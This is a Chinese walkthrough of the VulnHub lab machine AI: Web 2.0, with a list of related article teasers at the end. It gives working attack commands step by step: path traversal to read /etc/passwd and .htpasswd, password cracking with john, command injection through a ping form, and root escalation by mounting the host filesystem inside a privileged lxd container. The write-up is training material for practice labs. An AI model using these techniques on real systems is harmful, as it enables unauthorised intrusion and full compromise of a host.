vulnhub靶场ai-web 2.0

1 信息收集

1.1 主机发现

arp-scan -l

主机地址为192.168.1.4

1.2 服务端口扫描

nmap -sS -sV -A -T5 -p- 192.168.1.4

开放22,80端口

2 访问服务

2.1 80端口访问

http://192.168.1.4:80/

先尝试admin等其他常见用户名登录无果

然后点击signup发现这是一个注册接口

注册好username就可以直接进行登录,这里注册一个root

根据页面提示内容进行搜索

发现此为目录遍历漏洞

采用/download.php?file_name=…/etc/passwd的形式读取

一点一点的尝试

../../../../../../etc/passwd

根据之前信息收集的结果来看,服务器采用apache

所以尝试读取/etc/apache2/.htpasswd文件

得到对应的hash密码

尝试使用工具破解

这里采用john工具进行破解,kali自带

使用john进行爆破一下,,,,发现爆破不了,,, 后面看了描述提示了字典:

This is the second box from the series AI: Web and you will have more fun to crack this challenge.
The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root.
You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Daniel Miessler.
For any hint please tweet on @arif_xpress

使用字典:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt

john --wordlist=rockyou-45.txt temp.txt 

得到账号密码:aiweb2admin:c.ronaldo

尝试之前发现的ssh端口,发现不是ssh账号密码

3 目录扫描

3.1 dirb扫描

发现了webadmin页面需要密码账号登录

尝试用刚刚收集到的账号密码

账号aiweb2admin 密码c.ronaldo

发现可以登录

根据提示内容,得知还有robots页面

根据文件内容提示获取以下两个路径

http://192.168.1.4/webadmin/H05Tpin9555/

http://192.168.1.4/webadmin/S0mextras/

第一个页面中为ping测试的内容,可以通过命令执行漏洞方式来获取其他内容

而第二个页面中提示寻找一些有趣的东西在本文件夹中

首先在ping页面中输入127.0.0.1查看结果

显示为ping IP的反馈

使用管道符分割后再提交可以看到发生了变化

127.0.0.1|ls

发下其读出了文件夹下目录

已知此页面与需要查看文件页面为同级 如果返回上级页面再进入S0mextras下有可能会获取到对应的文件内容

使用

127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null

获得以下结果

可以看到隐藏文件 .sshUserCred55512.txt

http://192.168.1.4/webadmin/S0mextras/.sshUserCred55512.txt

账号:n0nr00tuser 密码:zxowieoi4sdsadpEClDws1sf

使用其登录ssh 登录成功

至此成功登入对应服务器

4 提权

4.1 查看权限

id查看权限

发现用户属于lxd组

想到了lxd提权

使用

find / -perm -u=s -type f 2>/dev/null

从根目录查找具有root权限的二进制文件

刚好发现了lxc也存在root权限

4.2 创建容器,挂载磁盘,进入容器,进入目录提权

GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD

把容器上传进去

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test //创建容器test

lxc init test test -c security.privileged=true //初始化

lxc config device add test test disk source=/ path=/mnt/root recursive=true //给 test 添加磁盘挂载到/mnt/root 本机的/根目录等价于容器的/mnt/root 目录

lxc start test //启动容器

lxc exec test /bin/sh //此时就是 root 权限,因为这个容器是你创建的,所以你享有所有权,如果你访问/root 是没有文件的

cd /mnt/root/root //这其实就是访问服务器的/root 目录

cat flag.txt

由于这个用户是在 lxd 组里面,所以他能创建容器,然后把 root 权限能操作的目录,挂在到容器里

面,那么你再进入容器里面进行操作的话,就是 root 权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/765166.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【Rust入门教程】hello world程序

文章目录 前言Hello World程序运行总结 前言 对于学习任何一种新的编程语言,我们都会从编写一个简单的Hello World程序开始。这是一个传统,也是一个开始。在这篇文章中,我们将一起学习如何在Rust中编写你的第一个程序:Hello Worl…

重磅发布|WAIC 2024最新活动日程安排完整发布!

WAIC 2024 将于 7 月在上海世博中心和世博展览馆举行,论坛时间为 7 月 4 日至 6 日,展览时间为 7 月 4 日至 7 日。会议涵盖 AI 伦理治理、大模型、具身智能、投融资、教育人才等重点话题,体现 AI 向善等价值导向,9 位大奖得主和 …

免交互简单操作

免交互 交互:我们发出指令控制程序的运行,程序在接收到指令后按照指令的效果作出对应的反应 免交互:间接的,通过第三方的方式把指令传给程序,不用直接下达指令 Here Document免交互 这是命令行格式,也可…

CVE-2024-0603 漏洞复现

CVE-2024-0603 源码:https://gitee.com/dazensun/zhicms 开题: CVE-2024-0603描述:ZhiCms up to 4.0版本的文件app/plug/controller/giftcontroller.php中存在一处未知漏洞。攻击者可以通过篡改参数mylike触发反序列化,从而远程…

Dockerhub无法拉取镜像配置阿里镜像加速器

打开阿里镜像加速地址: https://cr.console.aliyun.com/cn-hangzhou/instances/mirrors 根据平台类型按照对应方式进行配置:Dokcer Desktop是在右上角点开配置 找到Docker Engine 进行设置JSON结构: 记得要重启Docker服务才会生效&#xff01…

无偏归一化自适应心电ECG信号降噪方法(MATLAB)

心电信号作为一种生物信号,含有大量的临床应用价值的信息,在现代生命医学研究中占有重要的地位。但心电信号低频、低幅值的特点,使其在采集和传输的过程中经常受到噪声的干扰,使心电波形严重失真,从而影响后续的病情分…

WSO2 products 文件上传漏洞(CVE-2022-29464)

前言 CVE-2022-29464 是一个影响多个 WSO2 产品的严重远程代码执行(RCE)漏洞。这些产品包括 WSO2 API Manager、WSO2 Identity Server 和 WSO2 Enterprise Integrator 等。由于用户输入验证不当,该漏洞允许未经身份验证的攻击者在服务器上上…

修改Springboot项目名称

修改Springboot项目名称 1. 整体描述2. 具体步骤2.1 修改module名称2.2 修改程序包名2.3 mybatis/mybatis-plus配置修改2.4 logback文件2.5 yml配置2.6 Application启动类2.7 其他 3. 总结 1. 整体描述 开发过程中,经常遇到新来个项目,需要一份初始代码…

平衡树专题Splay

写在前面: 部分来自孙宝(Steven24)的博客,表示感谢。 认识 什么是Splay 就是BST的一种,整体效率是很高的,均摊的次数是O(logn)级别的。 基本操作就是把节点旋转到BST的root,从而改善BST的平…

线性代数大题细节。

4.4 方程组解的结构(二)_哔哩哔哩_bilibili

无序中的秩序:为何看似混乱的工作方式可能更高效;刚刚!研究表明:混乱可能更有利于创造力;注意!你的过度整理可能正在浪费时间

当面对循规蹈矩,还是自由独立的选择题时,你应当选择自由独立。因为这样,你不但更省力,更省心,而且效率更高,生活更好。 在日常生活和工作中,经常会遇到两种截然不同的人: • 一种是事无巨细,将一切都安排得…

全面了解机器学习

目录 一、基本认识 1. 介绍 2. 机器学习位置 二、机器学习的类型 1. 监督学习 2. 无监督学习 3. 强化学习 三、机器学习术语 1. 训练样本 2. 训练 3. 特征 4. 目标 5. 损失函数 四、机器学习流程 五、机器学习算法 1. 分类算法 2. 聚类算法 3. 关联分析 4. …

红队工具Finger 安装具体以步骤-示例centos

1.git clone https://github.com/EASY233/Finger.git 如果没有 yum install git 2.pip3 install -r requirements.txt 找到finger所在的文件夹 可以用find -name "Finger"进入文件中配置命令 前提要安装python yum install python-pip33.python3 Finger.py -h

Databend 开源周报第 151 期

Databend 是一款现代云数仓。专为弹性和高效设计,为您的大规模分析需求保驾护航。自由且开源。即刻体验云服务:https://app.databend.cn 。 Whats On In Databend 探索 Databend 本周新进展,遇到更贴近你心意的 Databend。 支持递归调用 UD…

浅谈k8s中cni0和docker0的关系和区别

最近在复习k8s网络方面的知识,查看之前学习时整理的笔记和文档还有过往自己总结的博客之后发现一个问题,就是在有关flannel和calico这两个k8s网络插件的文章和博客中,会涉及到cni0和docker0这两个网桥设备,但是都没有明确说明他们…

新华三通用大模型算力底座方案:为AI时代注入强大动力

在人工智能技术日新月异的今天,大模型作为推动AI进步的重要驱动力,是百行百业不断追逐的热点。大模型以其强大的泛化能力、卓越的模型效果和广泛的应用场景,正改变着人工智能的未来。作为国内领先的ICT解决方案提供商,新华三集团凭…

【刷题汇总--牛牛的快递、最小花费爬楼梯、数组中两个字符串的最小距离】

C日常刷题积累 今日刷题汇总 - day0021、牛牛的快递1.1、题目1.2、思路1.3、程序实现1.4、程序实现(扩展) 2、最小花费爬楼梯2.1、题目2.2、思路2.3、程序实现 3、数组中两个字符串的最小距离3.1、题目3.2、思路3.3、程序实现3.4、补充0x3f3f3f3f 4、题目链接 今日刷题汇总 - d…

解码未来城市:探秘数字孪生的奥秘

在科技日新月异的今天,"数字孪生"(Digital Twin)这一概念如同一颗璀璨的新星,照亮了智慧城市、智能制造等多个领域的前行之路。本文将深入浅出地解析数字孪生的定义、技术原理、应用场景及未来发展,带您一窥…

亚马逊TM商标跟卖,同行截流采集,人工手动跟卖选品更方便!

区分TM标,软件自动查询,人工手动查询方便。 大家好,跟大家说下如何区分TM标。 选择相对于的站点,选择TM。 软件采集出来的已备案、未备案TMR标,现在点击TM标就会跳到美国商标局。 可以清晰的看到这个地方只有一个序…

电力授时设备常用:低功耗定位授时模块ATGM332D-5T

ATGM332D有5N微星定位模块系列和5T授时模块,其中我们今天要解读的是一款拥有高性能、低功耗、低成本优势且适用于各类授时设备并支持BDS/GNSS的定位授时模块ATGM332D-5T。 该系列模块产品是基于中科微第四代低功耗GNSS SOC单芯片—AT6558,支持多种微星导…